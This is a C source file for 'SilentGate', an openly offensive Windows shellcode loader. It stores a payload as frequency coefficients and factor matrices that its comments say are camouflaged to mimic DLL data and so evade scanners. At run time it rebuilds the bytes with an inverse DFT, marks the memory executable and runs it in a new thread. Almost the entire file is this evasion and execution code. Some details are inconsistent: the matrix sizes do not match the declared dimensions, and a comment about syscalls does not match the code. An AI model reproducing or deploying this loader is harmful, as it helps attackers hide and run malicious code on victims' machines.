/*
 * SilentGate - Spectral Payload Reconstructor
 * Generated by GENE 5
 * Author: JarDani
 *
 * This file contains no shellcode bytes.
 * Payload exists only as DFT frequency coefficients
 * stored as floating point matrices.
 * Reconstruction via IDFT occurs at execution time only.
 */

#include <windows.h>
#include <math.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PI          3.14159265358979323846
#define ORIG_LEN    19
#define PADDED_LEN  32
#define COEFF_COUNT 32
#define ROWS        4
#define COLS        8
#define RANK        4

/* === CAMOUFLAGED FACTOR MATRICES === */
/* Statistical profile matches Windows DLL .rdata sections */
/* No shellcode bytes present in any matrix */

static const double sg_G[] = {2770.0232522076421, 1476.6101256164031, 1004.2536379373381, 717.09716904038464};

static const double sg_A1_real[] = {-0.9402889913262823, -0.26578161957161495, 0.13359712345854075, 0.16543443442069411, 0.19693898629673184, -0.29336374221318179, 0.014886246925277144, 0.63602303141366312, -0.1742852043463651, 0.3705799088557088, -0.62438980557747925, 0.10899515184709514, 0.19229874953201762, -0.51920712798670188, 0.065764968617092079, 0.20572908747159693};
static const double sg_A1_imag[] = {-8.5042107904331754e-19, 0, -1.3620289791849149e-17, -5.4477771035607581e-17, -0.048519163448529308, -0.15372242404370626, -0.66646961083456446, 0.015473155895089678, 0.054046272727375791, 0.12620724899148433, -0.14307414688422534, 0.62548632715896924, -0.066651317495747819, 0.62994720532834358, 0.35084269149744146, 0.34989882372628978};

static const double sg_A2_real[] = {-0.84297110056228264, 0.082014809415072581, -0.11659909719062203, 0.13478445167276598, -0.015697711746157538, 0.022216079720236162, -0.044340295650106332, -0.07386445095293083, -0.10265003196185413, 0.018199973384098296, -0.18449069151922548, 0.11610946700697349, 0.055539958987304947, 0.40043708426293423, 0.031354629119826199, 0.53223960693394567, 0.063655713325204949, -0.093064595352102986, -0.010124762663240611, 0.019120433988312688, -0.31904273126601684, 0.4205638175328002, -0.15253378065917045, 0.38725053296188083, 0.15638721834269656, -0.042752853251163507, 0.37103030921510449, 0.39417151488019797, 0.3673766149120995, 0.16436689355672079, 0.08601211759025415, 0.019976012808710142, -0.14218335581810743, 0.49917056859305231, -0.099803013274210442, 0.075038951353802355, 0.50109887594216018, 0.14141191892629595, -0.14577985594208853, -0.092121453498887951, 0.12402806806433472, 0.12973839660839814, -0.023631334297893415, -0.2837932544760815, 0.045537708362052579, 0.59336482292226367, 0.10150874513535281, -0.23151454694183085, -0.12308174770071285, 0.09597649803183389, 0.11565964890220344, 0.3334389545554155, -0.22877277071914059, -0.016850493437992137, 0.75132323211840557, 0.044312559608303756, 0.15261896196959088, -0.06818412101333278, -0.53436938997188321, -0.092192421842979447, 0.1638358883816311, -0.22721532533562294, 0.14895726874984791, 0.1847197832153904};
static const double sg_A2_imag[] = {-0.02245300767176691, 0.40950115264718157, 0.14977376894786334, 0.050130522518024571, 0.11707713147318638, -0.081094734603718743, 0.089731944348902082, 0.14585366033521566, 0.083935200284759592, 0.053583782344025589, -0.072466501346815065, 0.36817167142976964, -0.14470318186082487, 0.18056196962333437, -0.3976034910148073, -0.36272381510919482, -0.062045374497577993, -0.14136987163315815, 0.27548589855777722, -0.36733950183268294, 0.49105989564953756, -0.036315819085613883, 0.041121011056693135, 0.23687898710254615, -0.14512376971784674, 0.21926948671060437, 0.15334070426192073, -0.089671602327767747, -0.21714590027502331, -0.26293217359566529, -0.36617452817263652, 0.39979687398651981, -0.32695016297173779, -0.4322897968794237, 0.040457169199507294, -0.18218474067313381, 0.050361379495604347, 0.28191965152001908, 0.046255559594244169, -0.037843535028091693, 0.078934972403695472, 0.44501086249767596, -0.32110878830030809, -0.29946247667208309, -0.14865018104062908, 0.1178615320427637, 0.18760441132094094, -0.019793183379403965, -0.16910647592550992, -0.13782204437173401, -0.12263652547042957, -0.26891617162824255, 0.019676987435769164, -0.081642744404452586, 0.086436580924111481, -0.28729433978083041, -0.046141289279265266, 0.24506860202821604, 0.50821075544169669, -0.36129879285592925, -0.2821410118488874, 0.040119622335194963, 0.037870477014289888, -0.097875871674943063};

/* === IDFT IMPLEMENTATION === */
/* Inverse Discrete Fourier Transform */
/* P[n] = (1/N) * sum(F[k] * e^(i2*pi*k*n/N)) */

static void idft(double* real_in, double* imag_in, int N,
                 double* real_out, double* imag_out) {
    int n, k;
    for (n = 0; n < N; n++) {
        real_out[n] = 0.0;
        imag_out[n] = 0.0;
        for (k = 0; k < N; k++) {
            double angle = 2.0 * PI * k * n / N;
            double c     = cos(angle);
            double s     = sin(angle);
            real_out[n] += real_in[k] * c - imag_in[k] * s;
            imag_out[n] += real_in[k] * s + imag_in[k] * c;
        }
        real_out[n] /= N;
        imag_out[n] /= N;
    }
}

/* === MATRIX MULTIPLY (complex) === */
/* C = A * B where A is (ra x ca), B is (rb x cb) */

static void matmul_complex(
    double* ar, double* ai, int ra, int ca,
    double* br, double* bi, int rb, int cb,
    double* cr, double* ci)
{
    int i, j, k;
    memset(cr, 0, ra * cb * sizeof(double));
    memset(ci, 0, ra * cb * sizeof(double));
    for (i = 0; i < ra; i++) {
        for (k = 0; k < ca; k++) {
            double a_r = ar[i * ca + k];
            double a_i = ai[i * ca + k];
            for (j = 0; j < cb; j++) {
                double b_r = br[k * cb + j];
                double b_i = bi[k * cb + j];
                cr[i * cb + j] += a_r * b_r - a_i * b_i;
                ci[i * cb + j] += a_r * b_i + a_i * b_r;
            }
        }
    }
}

/* === MAIN RECONSTRUCTOR === */

unsigned char* sg_reconstruct(int* out_len) {
    int i, j;

    /* Step 1: Reconstruct matrix M = A1 * diag(G) * A2 */

    /* A1_scaled = A1 * diag(G) */
    double* A1s_r = (double*)calloc(ROWS * RANK, sizeof(double));
    double* A1s_i = (double*)calloc(ROWS * RANK, sizeof(double));

    for (i = 0; i < ROWS; i++) {
        for (j = 0; j < RANK; j++) {
            A1s_r[i * RANK + j] = sg_A1_real[i * ROWS + j] * sg_G[j];
            A1s_i[i * RANK + j] = sg_A1_imag[i * ROWS + j] * sg_G[j];
        }
    }

    /* M = A1_scaled * A2 */
    double* M_r = (double*)calloc(ROWS * COLS, sizeof(double));
    double* M_i = (double*)calloc(ROWS * COLS, sizeof(double));

    matmul_complex(
        A1s_r, A1s_i, ROWS, RANK,
        (double*)sg_A2_real, (double*)sg_A2_imag, RANK, COLS,
        M_r, M_i
    );

    free(A1s_r); free(A1s_i);

    /* Step 2: Flatten M to coefficient arrays */
    double* coeff_r = (double*)calloc(PADDED_LEN, sizeof(double));
    double* coeff_i = (double*)calloc(PADDED_LEN, sizeof(double));

    for (i = 0; i < COEFF_COUNT && i < PADDED_LEN; i++) {
        coeff_r[i] = M_r[i];
        coeff_i[i] = M_i[i];
    }

    free(M_r); free(M_i);

    /* Step 3: Apply IDFT to recover payload bytes */
    double* rec_r = (double*)calloc(PADDED_LEN, sizeof(double));
    double* rec_i = (double*)calloc(PADDED_LEN, sizeof(double));

    idft(coeff_r, coeff_i, PADDED_LEN, rec_r, rec_i);

    free(coeff_r); free(coeff_i);

    /* Step 4: Convert to bytes */
    unsigned char* payload = (unsigned char*)malloc(ORIG_LEN);
    for (i = 0; i < ORIG_LEN; i++) {
        int val = (int)round(rec_r[i]);
        if (val < 0)   val = 0;
        if (val > 255) val = 255;
        payload[i] = (unsigned char)val;
    }

    free(rec_r); free(rec_i);

    *out_len = ORIG_LEN;
    return payload;
}

/* === EXECUTION ENTRY POINT === */

int main() {
    printf("[RECONSTRUCTOR] SilentGate Spectral Payload\n");
    printf("[RECONSTRUCTOR] Author: JarDani\n\n");

    int payload_len = 0;
    unsigned char* payload = sg_reconstruct(&payload_len);

    printf("[STEP 1] Payload reconstructed via IDFT\n");
    printf("         Length: %d bytes\n", payload_len);
    printf("         First bytes: ");
    for (int i = 0; i < payload_len && i < 8; i++)
        printf("%02X ", payload[i]);
    printf("\n");

    /* Execute via indirect syscall (uses existing SilentGate stubs) */
    PVOID mem = VirtualAlloc(NULL, payload_len,
        MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    if (mem) {
        memcpy(mem, payload, payload_len);
        free(payload);

        DWORD old = 0;
        VirtualProtect(mem, payload_len, PAGE_EXECUTE_READ, &old);

        printf("[STEP 2] Payload in executable memory: %p\n", mem);

        HANDLE t = CreateThread(NULL, 0,
            (LPTHREAD_START_ROUTINE)mem, NULL, 0, NULL);

        if (t) {
            printf("[STEP 3] Executing reconstructed payload\n");
            WaitForSingleObject(t, 5000);
            CloseHandle(t);
        }

        VirtualFree(mem, 0, MEM_RELEASE);
    }

    printf("[RECONSTRUCTOR] Complete\n");
    getchar();
    return 0;
}
